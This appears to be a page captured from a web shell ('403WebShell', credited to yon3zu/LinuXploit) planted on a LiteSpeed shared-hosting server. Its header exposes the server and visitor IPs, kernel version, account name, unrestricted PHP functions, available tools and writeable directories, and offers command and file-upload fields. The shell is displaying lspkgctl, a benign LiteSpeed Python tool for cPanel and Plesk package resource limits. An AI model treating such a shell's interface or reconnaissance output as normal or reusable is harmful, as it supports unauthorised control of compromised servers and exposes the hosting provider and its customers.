Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.145.97.1
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/usr/local/lsws/lsns/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/usr/local/lsws/lsns/bin//lspkgctl
#!/usr/bin/python3
import argparse
import common
import csv
import errno
import json
import logging
import os
import pwd
import re
import subprocess
import sys
import time
import glob

from stat import *
from subprocess import PIPE

def command_requires_pkg(command):
    """Return True when *command* is one of the commands that act on named packages."""
    pkg_commands = ('default', 'list', 'set', 'set-force', 'validate')
    return command in pkg_commands

def validate_environment():
    """Run the shared environment check by delegating to ``common.ls_ok()``.

    NOTE(review): what ``ls_ok`` verifies, and how it reports failure, is
    defined in the ``common`` module and is not visible from this file.
    """
    common.ls_ok()
    
def init_pgm():
    """Parse the command line, configure logging and validate the arguments.

    Returns:
        The ``argparse.Namespace`` holding the parsed arguments.

    The ``version`` command is handled here and terminates the process with
    status 0.  Invalid argument combinations are reported through
    ``common.fatal_error``.
    """
    common.init_logging()
    parser = argparse.ArgumentParser(prog="lspkgctl",
                                     description='LiteSpeed Packages Control Program')
    parser.add_argument("command", type=str, help="The packages command",
                        choices=['default', 'list', 'list-all', 'set', 'set-force', 'userpkg', 'usersize', 'validate', 'validate-all', 'version'])
    parser.add_argument("pkg", type=str, nargs='*', default=None, help="package name")
    parser.add_argument("--cpu", type=str, help="limit CPU access.  Specify a percentage of a complete core, 100 is 1 complete core.  Default is no limit (-1).")
    parser.add_argument("--io", type=str, help="limit I/O access.  Specify in bytes/sec.  Default is no limit (-1).")
    parser.add_argument("--iops", type=str, help="limit I/O access.  Specify in IOs per second.  Default is no limit (-1).")
    parser.add_argument('-l', '--log', type=int, help='set logging level, 10=Debug, 20=Info, 30=Warning, 40=Error.  Default is Info')
    parser.add_argument("--mem", type=str, help="limit virtual memory access.  Specify in bytes.  Default is no limit (-1).")
    parser.add_argument('-q', '--quiet', action='store_true', help='turns off all logging and only outputs what is requested.')
    parser.add_argument('-s', '--sleep', type=int, default=0, help="number of seconds to pause.  Should only be used when running in the background")
    parser.add_argument("--tasks", type=str, help="limit number of tasks.  Specify a maximum count of tasks that can be started.")
    parser.add_argument("--size", type=str, help="set redis package size.  Default is not defined (-1).")
    parser.add_argument("--user", type=str, help="the user to request the size for.  Required for the commands usersize and userpkg")
    args = parser.parse_args()

    # An explicit --log level wins even when --quiet is given; otherwise
    # non-quiet runs log at INFO.
    if not args.quiet or args.log is not None:
        if args.log is not None:
            logging.getLogger().setLevel(args.log)
        else:
            logging.getLogger().setLevel(logging.INFO)
        logging.debug("Entering lspkgctl")

    validate_environment()
    command = args.command
    # A positional declared with nargs='*' parses to an empty list (not None)
    # when omitted, so test for emptiness rather than comparing with None.
    if command_requires_pkg(command) and not args.pkg:
        common.fatal_error("You must specify a package for the %s command" % command)
    if command == 'version':
        logging.info("Version: %s" % common.VERSION)
        if args.quiet:
            print(common.VERSION)
        sys.exit(0)
    no_qualifier = (args.cpu is None and args.io is None and args.iops is None
                    and args.mem is None and args.tasks is None and args.size is None)
    if command.startswith('set') and no_qualifier:
        common.fatal_error("You specified command: %s and no qualifier to set with it" % command)
    if command in ('usersize', 'userpkg') and not args.user:
        common.fatal_error("You must specify a --user with the usersize or userpkg commands")
    if args.sleep > 0:
        time.sleep(args.sleep)
    return args

def run_program(args, fail_reason = ""):
    """Run an external program and return its standard output as text.

    Args:
        args: argument vector handed to ``subprocess.run``; ``args[0]`` is
            the program name used in error messages.
        fail_reason: when non-empty the program is *expected* to exit with a
            non-zero status, and a zero status is reported as an error.

    Returns:
        The captured standard output decoded as UTF-8.
    """
    logging.debug('run: ' + str(args))
    proc = subprocess.run(args, stdout=PIPE, stderr=PIPE)
    expect_failure = fail_reason != ""
    failed = proc.returncode != 0
    if expect_failure and not failed:
        common.fatal_error('Expected: ' + args[0] + ' to fail: ' + fail_reason)
    elif failed and not expect_failure:
        common.fatal_error('Error in running: ' + args[0] + ' errors: ' + proc.stdout.decode('utf-8') + ' ' + proc.stderr.decode('utf-8'))
    return proc.stdout.decode('utf-8')

def initialized_pkg():
    """Return a fresh package description containing only an empty ``uids`` list."""
    return {'uids': []}

def read_pkg_sizes():
    """Load the package-size table from the CSV file named by ``common``.

    Returns:
        A dict mapping the first CSV column to the second.  A missing or
        unreadable file yields an empty dict; an error part-way through
        reading yields whatever rows were read before the error.
    """
    sizes = {}
    size_file = common.get_package_size_file()
    try:
        handle = open(size_file, 'r', encoding="utf-8")
    except OSError as err:
        if err.errno == errno.ENOENT:
            # A missing file is not an error: no sizes have been stored.
            logging.debug('File not found: %s' % size_file)
        else:
            logging.warning('Error opening %s: %s - reinitializing' % (size_file, err.strerror))
        return sizes
    with handle:
        try:
            for row in csv.reader(handle, delimiter=',', quotechar='"'):
                logging.debug('package: [' + row[0] + ']: ' + row[1])
                sizes[row[0]] = row[1]
        except Exception as err:
            logging.warning('Error reading %s: %s - reinitialzing' % (size_file, err))
    return sizes

def write_pkg_sizes(pkg_sizes):
    """Write the package-size table to the CSV file named by ``common``.

    Args:
        pkg_sizes: dict mapping package name to its size string.

    Returns:
        True when every row was written, False when the file could not be
        opened or a row could not be written (a warning is logged).
    """
    size_file = common.get_package_size_file()
    try:
        handle = open(size_file, 'w', encoding="utf-8")
    except OSError as err:
        logging.warning('Error opening %s for write: %s' % (size_file, err.strerror))
        return False
    with handle:
        try:
            out = csv.writer(handle, delimiter=',', quotechar='"')
            for name, size in pkg_sizes.items():
                logging.debug('package: [' + name + ']: ' + size)
                out.writerow([name, size])
        except Exception as err:
            logging.warning('Error writing %s: %s' % (size_file, err))
            return False
    return True

def read_pkg(pkg, pkg_sizes):
    """Load the stored JSON description of package *pkg*.

    Args:
        pkg: package name; ``common.pkg_to_filename`` maps it to a file.
        pkg_sizes: dict of package name to size; when it has an entry for
            *pkg* that value is placed under the ``size`` key of the result.

    Returns:
        The package dict with a sorted ``uids`` list.  When the file is
        missing, unreadable or not parseable, a freshly initialized package
        (without ``size``) is returned instead.
    """
    pkg_file = common.pkg_to_filename(pkg)
    try:
        handle = open(pkg_file, 'r', encoding="utf-8")
    except OSError as err:
        if err.errno == errno.ENOENT:
            logging.debug('File not found: %s' % pkg_file)
        else:
            logging.warning('Error opening %s: %s - reinitializing' % (pkg_file, err.strerror))
        return initialized_pkg()
    with handle:
        try:
            description = json.load(handle)
        except Exception as err:
            logging.warning('Error reading %s: %s - reinitialzing' % (pkg_file, err))
            return initialized_pkg()
    if 'uids' not in description:
        description['uids'] = []
    description['uids'].sort()
    if pkg in pkg_sizes:
        description['size'] = pkg_sizes[pkg]
    return description

def list_pkg(pkg, pkg_sizes):
    """Return the description of *pkg* as produced by ``read_pkg``."""
    return read_pkg(pkg, pkg_sizes)

def command_list(args, pkg_sizes, single_list=False):
    """Print the selected package descriptions as JSON and return 0.

    When *single_list* is true or the command is ``list``, only the packages
    named in ``args.pkg`` are listed; otherwise every file matching the
    package filename pattern is listed.
    """
    if single_list or args.command == 'list':
        listing = {name: list_pkg(name, pkg_sizes) for name in args.pkg}
    else:
        listing = {}
        for path in glob.glob(common.pkg_to_filename('*')):
            # The package name is the part of the file name before '.conf'.
            name = os.path.basename(path).split('.conf')[0]
            logging.debug('From file: %s, using pkg %s' % (path, name))
            listing[name] = list_pkg(name, pkg_sizes)
    print(json.dumps({'packages': listing}, indent=4))
    return 0

def plesk_home_dict():
    """Map home directory to passwd entry for every user at or above the minimum uid."""
    homes = {}
    for entry in pwd.getpwall():
        if entry.pw_uid < common.get_min_uid():
            continue
        logging.debug('home_dict key: ' + entry.pw_dir)
        homes[entry.pw_dir] = entry
    return homes

def read_pleskplans():
    """Build the plan/user tables from the Plesk database.

    Runs ``plesk db`` with a query returning (login, home, plan name) rows
    and parses the tabular output.  Each row's home directory is looked up
    in the table built by ``plesk_home_dict`` to find the system user.

    Returns:
        A ``(plans, userplans)`` tuple: ``plans`` maps plan name to a list
        of uids, ``userplans`` maps user name to plan name.

    A row that does not yield exactly three cells, or whose home directory
    is unknown, is reported through ``common.fatal_error``.
    """
    home_dict = plesk_home_dict()
    plans = {}
    userplans = {}
    # Thanks to Stas Karpinsky of vangus.co.il for correcting the SQL!
    query = ("select sys_users.login, sys_users.home, "
             "Templates.name from sys_users "
             "join hosting on sys_users.id = hosting.sys_user_id "
             "join domains on hosting.dom_id = domains.id "
             "join Subscriptions on domains.id = Subscriptions.object_id "
             "and Subscriptions.object_type = 'domain' "
             "join PlansSubscriptions on Subscriptions.id = PlansSubscriptions.subscription_id "
             "join Templates on PlansSubscriptions.plan_id = Templates.id")
    plan_lines = run_program(['plesk', 'db', query])
    # Compiled once; matches one "| value   |" cell of the table output.
    pat = re.compile(r'\|\s(.*?)\s{1,}\|')
    for line in plan_lines.splitlines():
        # Skip the table borders and the header row.
        if line.startswith('+-') or line.startswith('| login'):
            continue
        matches = []
        pos = 0
        while pos < len(line):
            match = pat.search(line, pos)
            if not match:
                break
            logging.debug('Appending: %s in %s' % (match[1], line))
            # Resume just after this cell's opening '|' so that its closing
            # '|' can serve as the opening '|' of the next cell.
            pos = match.start() + 1
            matches.append(match[1])
        if len(matches) != 3:
            for cell in matches:
                logging.debug(cell)
            common.fatal_error("Expected 3 matches in %s and got %d" % (line, len(matches)))
        if matches[1] not in home_dict:
            common.fatal_error("%s not found in user dictionary from %s" % (matches[1], line))
        plan = matches[2]
        user = home_dict[matches[1]]
        logging.debug("   add to %s: %s (%d)" % (plan, user.pw_name, user.pw_uid))
        if plan not in plans:
            plans[plan] = []
        plans[plan].append(user.pw_uid)
        userplans[user.pw_name] = plan
    return plans, userplans

def read_usersplans():
    """Build the plan/user tables for the current control panel.

    When ``common.get_plesk()`` is true the work is delegated to
    ``read_pleskplans``.  Otherwise every regular file under
    ``/var/cpanel/packages`` defines a plan and ``/etc/userplans`` supplies
    the ``user: plan`` assignments.

    Returns:
        A ``(plans, userplans)`` tuple: ``plans`` maps plan name to a list
        of uids, ``userplans`` maps user name to plan name.

    Failure to open ``/etc/userplans`` or to resolve a listed user is
    reported through ``common.fatal_error``.
    """
    if common.get_plesk():
        return read_pleskplans()
    plans = {}
    userplans = {}
    for planfile in glob.glob('/var/cpanel/packages/*'):
        if os.path.isfile(planfile):
            plan = os.path.basename(planfile)
            plans[plan] = []
            logging.debug("Check package: %s" % plan)
    try:
        f = open('/etc/userplans', 'r', encoding="utf-8")
    except Exception as err:
        common.fatal_error('Error opening /etc/userplans: %s' % err)
    # The context manager closes the file on every exit path, including
    # when an error is raised while processing a line.
    with f:
        for line in f:
            if line.startswith('#'):
                continue
            pieces = line.split(': ')
            if len(pieces) != 2:
                continue
            pkg = pieces[1].strip(' \n\t')
            user = pieces[0].strip()
            logging.debug('   pkg: %s, user: %s' % (pkg, user))
            # Assignments to plans without a package file are ignored.
            if pkg not in plans:
                continue
            try:
                pwd_var = pwd.getpwnam(user)
            except Exception as err:
                common.fatal_error("passwd entry error: %s for user %s" % (err, user))
            plans[pkg].append(pwd_var.pw_uid)
            userplans[str(pwd_var.pw_name)] = pkg
            logging.debug("add to %s: %s (%d)" % (pkg, user, pwd_var.pw_uid))
    return plans, userplans
    
def set_users_to_pkg(opt, users, users_vals, org_pkg, pkg_json, force, args_dict):
    """Apply the package value of one option to the users that need it.

    Args:
        opt: option name; passed to ``lscgctl`` as ``--<opt>``.
        users: uids to consider.
        users_vals: per-user current values, keyed by ``str(uid)``.
        org_pkg: package values before the current change.
        pkg_json: package values to apply; its ``uids`` list names the
            users already recorded as members.
        force: when true, recorded members are updated even if their
            current value differs from the original package value.
        args_dict: when not None, options absent from it are skipped.

    Returns:
        True when ``lscgctl`` was run for at least one user, else False.
    """
    if args_dict is not None and opt not in args_dict:
        return False
    cgval = '-1' if arrInfinite(opt, pkg_json) else pkg_json[opt]
    command = [common.get_bin_file('lscgctl'), '--' + opt, cgval, 'set']
    fixed_len = len(command)
    for uid in users:
        uid_key = str(uid)
        current = users_vals[uid_key]
        # Users not yet recorded in the package are always brought in line.
        do_force = True if uid not in pkg_json['uids'] else force
        if not do_force and not opt_val_eq(opt, current, org_pkg):
            # The user's value no longer matches the original package
            # value, so leave it alone.
            if opt not in org_pkg or opt not in current:
                logging.debug('Skip opt %s for %s (not force)' % (opt, uid_key))
            else:
                logging.debug('Skip opt %s for %s (not force: %s != %s)' % (opt, uid_key, current[opt], org_pkg[opt]))
            continue
        if opt_val_eq(opt, current, pkg_json):
            logging.debug('Skip opt %s for %s (already value)' % (opt, uid_key))
            continue
        logging.debug('Use opt %s for user %s' % (opt, uid_key))
        command.append(uid_key)
    if len(command) == fixed_len:
        # No user was appended, so there is nothing to run.
        return False
    run_program(command)
    return True

def write_pkg(pkg, pkg_json):
    """Write the description of *pkg* to its file as indented JSON.

    Options whose value means "no limit" (see ``arrInfinite``) are removed
    from *pkg_json* before writing; the caller's dict is modified in place.

    Any failure to open, write or close the file is reported through
    ``common.fatal_error``.
    """
    pkg_file = common.pkg_to_filename(pkg)
    logging.debug('Write pkg: %s as %s' % (pkg, pkg_file))
    try:
        f = open(pkg_file, 'w', encoding="utf-8")
    except Exception as err:
        common.fatal_error('Error opening %s for write: %s' % (pkg_file, err))
    for opt in common.get_options():
        if opt in pkg_json and arrInfinite(opt, pkg_json):
            del pkg_json[opt]
    try:
        # Closing inside the try matters: buffered output is flushed on
        # close, so a write error may only surface there.
        with f:
            f.write(json.dumps(pkg_json, indent=4))
    except Exception as err:
        common.fatal_error('Error writing %s: %s' % (pkg_file, err))
    
def revalidate_pkg(pkg, users, users_vals, org_pkg, pkg_json, force, args_dict):
    """Bring the users of *pkg* in line with the package and persist it.

    Every option from ``common.get_options()`` is passed through
    ``set_users_to_pkg``.  The package file is rewritten, with ``uids``
    replaced by *users*, when any option was applied, when the set of users
    changed, or when *org_pkg* differs from *pkg_json*.
    """
    logging.debug("revalidate_pkg")
    if force:
        candidates = users
    else:
        # NOTE(review): this compares str(uid) against pkg_json['uids'],
        # while set_users_to_pkg compares the uid itself; if 'uids' holds
        # ints this filter keeps every user.  Confirm before changing.
        candidates = [uid for uid in users if str(uid) not in pkg_json['uids']]
    updated = False
    for opt in common.get_options():
        updated = set_users_to_pkg(opt, candidates, users_vals, org_pkg, pkg_json, force, args_dict) or updated
    if not updated and set(users) != set(pkg_json['uids']):
        updated = True
        logging.debug("Changed users, so update pkg")
    if updated or org_pkg != pkg_json:
        pkg_json['uids'] = users
        write_pkg(pkg, pkg_json)

def validate_pkg(pkg, pkg_sizes, users_vals, users):
    """Re-apply the stored settings of *pkg* to *users* without forcing."""
    stored = read_pkg(pkg, pkg_sizes)
    # The same dict serves as both the original and the target package.
    revalidate_pkg(pkg, users, users_vals,
                   org_pkg=stored, pkg_json=stored, force=False, args_dict=None)
    
def command_validate(args, users_vals, usersplans, pkg_sizes):
    """Validate every known package, or only the packages named in ``args.pkg``.

    For ``validate-all`` and ``list-all`` each package in *usersplans* is
    validated; otherwise each named package must exist in *usersplans* or
    ``common.fatal_error`` is called.
    """
    if args.command in ('validate-all', 'list-all'):
        wanted = list(usersplans)
    else:
        wanted = args.pkg
    for pkg in wanted:
        if pkg not in usersplans:
            common.fatal_error("Specified package: %s not found" % pkg)
        validate_pkg(pkg, pkg_sizes, users_vals, usersplans[pkg])

def arrInfinite(opt, arr):
    """Return True when *opt* is absent from *arr* or set to None, '' or '-1'."""
    if opt not in arr:
        return True
    value = arr[opt]
    return value is None or value in ('', '-1')

def opt_val_eq(opt, arr1, arr2):
    """Return True when *opt* has an equivalent value in both mappings.

    If either side is "infinite" (see ``arrInfinite``) the two are equal
    only when both are.  Otherwise both values are normalised through
    ``common.int_num_values`` and ``common.str_num_values`` and compared.
    """
    left_infinite = arrInfinite(opt, arr1)
    right_infinite = arrInfinite(opt, arr2)
    if not (left_infinite or right_infinite):
        left = common.str_num_values(common.int_num_values(arr1[opt]))
        right = common.str_num_values(common.int_num_values(arr2[opt]))
        return left == right
    return left_infinite == right_infinite

def set_json(args, pkg_json):
    """Copy option values given on the command line into *pkg_json*.

    Only options whose command-line value is set and differs from the
    package value (per ``opt_val_eq``) are copied.

    Returns:
        True when at least one option in *pkg_json* was changed.
    """
    requested = vars(args)
    logging.debug('In set_json')
    changed = False
    for opt in common.get_options():
        if opt_val_eq(opt, requested, pkg_json):
            logging.debug('   equal ' + opt)
            continue
        if requested.get(opt) is None:
            logging.debug('   not set ' + opt)
            continue
        pkg_json[opt] = requested[opt]
        changed = True
    if not changed:
        logging.debug('set_json nothing changed')
    return changed

def get_users_vals():
    """Return the parsed JSON output of ``lscgctl list-all q``.

    A parse failure is reported through ``common.fatal_error``.
    """
    listing = run_program([common.get_bin_file('lscgctl'), 'list-all', 'q'])
    try:
        parsed = json.loads(listing)
    except Exception as err:
        common.fatal_error('Error parsing user details: %s' % err)
    return parsed

def deep_copy(pkg, pkg_json, pkg_sizes):
    """Return a snapshot of the option values of *pkg*.

    Args:
        pkg: package name, used to look up its size in *pkg_sizes*.
        pkg_json: package description to snapshot.
        pkg_sizes: dict mapping package name to size.

    Returns:
        A new dict holding every option from ``common.get_options()`` that
        is present in *pkg_json*, plus ``size`` when *pkg_sizes* has an
        entry for *pkg*.  Values are copied by reference; ``uids`` is not
        included.
    """
    copy = {opt: pkg_json[opt] for opt in common.get_options() if opt in pkg_json}
    # pkg_sizes is keyed by package name, so look up this package rather
    # than the literal key "size".
    if pkg in pkg_sizes:
        copy["size"] = pkg_sizes[pkg]
    return copy

def command_set(args, users_vals, usersplans, pkg_sizes):
    """Handle the ``set``, ``set-force`` and ``default`` commands.

    For each package in ``args.pkg`` the stored description is loaded, the
    command-line values are merged in (``set``/``set-force`` only), and the
    package's users are revalidated.  ``set-force`` and ``default`` update
    all users of the package.  When ``--size`` was given the size table is
    updated (``-1`` removes the entry) and written back at the end.

    Returns:
        0.  A package that needs revalidation but is missing from
        *usersplans* is reported through ``common.fatal_error``.
    """
    all_users = 'force' in args.command or 'default' == args.command
    write_sizes = False
    for pkg in args.pkg:
        pkg_json = read_pkg(pkg, pkg_sizes)
        org_pkg = deep_copy(pkg, pkg_json, pkg_sizes)
        if 'set' in args.command:
            if args.size is not None:
                logging.debug('set for pkg: ' + pkg + ' size: ' + args.size)
                write_sizes = True
                if args.size == '-1':
                    if pkg in pkg_sizes:
                        del pkg_sizes[pkg]
                else:
                    pkg_sizes[pkg] = args.size
            # Nothing changed and no forced update: no users to touch.
            if not set_json(args, pkg_json) and not all_users:
                continue
        # Report an unknown package the same way command_validate does
        # instead of failing with a bare KeyError.
        if pkg not in usersplans:
            common.fatal_error("Specified package: %s not found" % pkg)
        revalidate_pkg(pkg, usersplans[pkg], users_vals, org_pkg, pkg_json, all_users, vars(args))
    if write_sizes:
        write_pkg_sizes(pkg_sizes)
    return 0

def command_usersize(args, pkg_sizes, userplans):
    """Print the size configured for the package of ``args.user``.

    Returns:
        0 after printing the size.  Exits the process with status 1 when
        the user has no known package or the package has no size.
    """
    user = str(args.user)
    if user not in userplans:
        logging.debug('user: ' + args.user + ' NOT in known packages')
        sys.exit(1)
    plan = userplans[user]
    if plan not in pkg_sizes:
        logging.debug('user: ' + args.user + ' in pkg: ' + plan + ' BUT HAS NO SIZE')
        sys.exit(1)
    logging.debug('user: ' + args.user + ' in pkg: ' + plan + ' size: ' + pkg_sizes[plan])
    print(pkg_sizes[plan])
    return 0

def command_userpkg(args, userplans):
    """Print the package that ``args.user`` belongs to.

    Returns:
        0 after printing the package name.  Exits the process with status 1
        when the user is not in *userplans*.
    """
    user = str(args.user)
    if user not in userplans:
        logging.debug('user: ' + args.user + ' NOT in known packages')
        sys.exit(1)
    plan = userplans[user]
    logging.debug('user: ' + args.user + ' in pkg: ' + plan)
    print(plan)
    return 0

def do_pgm(args):
    """Dispatch the parsed command to its handler and return the handler's result.

    The plan tables are always read first.  Commands are matched by
    substring, so ``validate`` also covers ``validate-all``, ``list`` covers
    ``list-all`` and ``set`` covers ``set-force``.  The list commands
    validate before listing.
    """
    cmd = args.command
    logging.debug("Entering lspkgctl, command: %s" % cmd)
    usersplans, uidplans = read_usersplans()
    if cmd == 'usersize':
        ret = command_usersize(args, read_pkg_sizes(), uidplans)
    elif cmd == 'userpkg':
        ret = command_userpkg(args, uidplans)
    elif 'validate' in cmd or 'list' in cmd:
        pkg_sizes = read_pkg_sizes()
        users_vals = get_users_vals()
        ret = command_validate(args, users_vals, usersplans, pkg_sizes)
        if 'list' in cmd:
            ret = command_list(args, pkg_sizes)
    elif 'set' in cmd or 'default' in cmd:
        pkg_sizes = read_pkg_sizes()
        users_vals = get_users_vals()
        ret = command_set(args, users_vals, usersplans, pkg_sizes)
    else:
        common.fatal_error('Unexpected command: %s' % cmd)
    logging.debug("Exiting lspkgctl")
    return ret

def main():
    """Parse the command line, run the requested command and return its result."""
    args = init_pgm()
    return do_pgm(args)


if __name__ == "__main__":
    # Use the command's result as the process exit status instead of
    # discarding it (a result of None exits with status 0).
    sys.exit(main())

Youez - 2016 - github.com/yon3zu
LinuXploit